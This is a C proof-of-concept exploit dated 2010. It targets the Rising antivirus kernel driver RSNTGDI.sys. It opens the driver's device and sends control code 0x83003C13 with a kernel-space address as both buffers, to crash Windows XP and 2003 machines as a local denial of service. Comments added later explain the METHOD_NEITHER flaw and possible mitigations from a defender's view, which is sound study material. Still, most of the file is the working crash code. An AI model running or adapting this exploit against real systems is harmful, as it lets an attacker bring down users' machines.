/*
A BUG in this file has already been published on the net; that BUG was found in CONTROL CODE:0x83003C0B. So I checked the file's
other CONTROL CODEs. Just for fun.....

# Exploit Title: [Rising RSNTGDI.sys Local Denial of Service(CONTROL CODE:83003C13) ]
# Date: [2010.11.1]
# Author: [ ze0r ]
# Version: [Rising 2009.Publish Date:2009.10.13.]
# Tested on: [Windows XPSP3 Chinese Simplified & Windows 2003 Chinese Simplified]
*/
#include "stdio.h"
#include "windows.h"
/* Handle to the rsntgdi device object; assigned by main() via CreateFile and
 * read by boom() when it issues the IOCTL. */
HANDLE DriverHandle = NULL;
/*
 * Send control code 0x83003C13 to the device behind DriverHandle, passing
 * systembuffer as the input buffer and userbuffer as the output buffer, each
 * with a claimed length of 20 bytes. Both pointers are printed first.
 *
 * Reading the control code with the standard CTL_CODE layout:
 *   bits 0-1   = 3 -> METHOD_NEITHER
 *   bits 14-15 = 0 -> FILE_ANY_ACCESS
 * With METHOD_NEITHER the I/O manager does not buffer or validate the two
 * pointers; the driver receives them exactly as the caller supplied them.
 * A handler for such a code has to ProbeForRead/ProbeForWrite the ranges and
 * touch them only inside an exception handler; the safer fix is to switch
 * the code to METHOD_BUFFERED.
 * NOTE(review): the driver source is not on this page, so the missing probe
 * is the presumed root cause of the reported crash, not a confirmed one.
 *
 * NOTE(review): the DeviceIoControl result is discarded, and lpBytesReturned
 * is NULL although lpOverlapped is NULL too, which the API documentation
 * does not allow.
 */
void boom(PVOID systembuffer, PVOID userbuffer)
{
    const DWORD control_code = 0x83003C13;
    const DWORD claimed_len = 20;

    printf("userbuffer Is:%p\n\n", userbuffer);
    printf("The systembuffer Is:%p\n\n", systembuffer);

    (void)DeviceIoControl(DriverHandle,
                          control_code,
                          systembuffer, claimed_len,  /* input buffer, size  */
                          userbuffer, claimed_len,    /* output buffer, size */
                          NULL,                       /* lpBytesReturned     */
                          NULL);                      /* lpOverlapped        */
}
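/*
 * Entry point of the proof of concept: prints the banner, opens the rsntgdi
 * device, waits for a key press, then calls boom() with 0x88888888 as both
 * the input and the output buffer address.
 *
 * Defender's reading of what is visible here:
 *  - The device is opened with a desired access of 0. The control code used
 *    by boom() carries FILE_ANY_ACCESS in its access bits, so no read or
 *    write right on the handle is needed to reach the handler. Whether an
 *    unprivileged account can open the device depends on the device object's
 *    ACL, which this page does not show; a restrictive ACL on the device is
 *    the first mitigation to check.
 *  - 0x88888888 lies above 0x80000000, i.e. in the kernel half of the address
 *    space on a default 32-bit Windows layout. A handler that probes its
 *    METHOD_NEITHER pointers would reject such an address outright.
 *
 * Returns 0 when the IOCTL was issued and 1 when the device could not be
 * opened.
 */
int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;

    printf("-------------------------------------------------------------------------------\n");
    printf("---------------------------C0ed By:ze0r,Let's ROCK!!---------------------------\n");
    printf("----------------------------------QQ:289791332---------------------------------\n");
    printf("-------------------------------------------------------------------------------\n\n");

    DriverHandle = CreateFile("\\\\.\\rsntgdi",
                              0,                                   /* no access rights requested */
                              FILE_SHARE_READ | FILE_SHARE_WRITE,
                              NULL,
                              OPEN_EXISTING,
                              0,
                              NULL);
    if (DriverHandle == INVALID_HANDLE_VALUE) {
        printf("Open Driver Error!\n\n");
        /* Report the failure to the caller; the original returned 0 here. */
        return 1;
    }

    printf("OK.Let's Crash It!\n\n");
    getchar();  /* pause until the operator confirms */

    boom((PVOID)0x88888888, (PVOID)0x88888888);

    /* Reached only if the IOCTL returned, i.e. the system stayed up.
     * The original never released the device handle. */
    CloseHandle(DriverHandle);

    return 0;
}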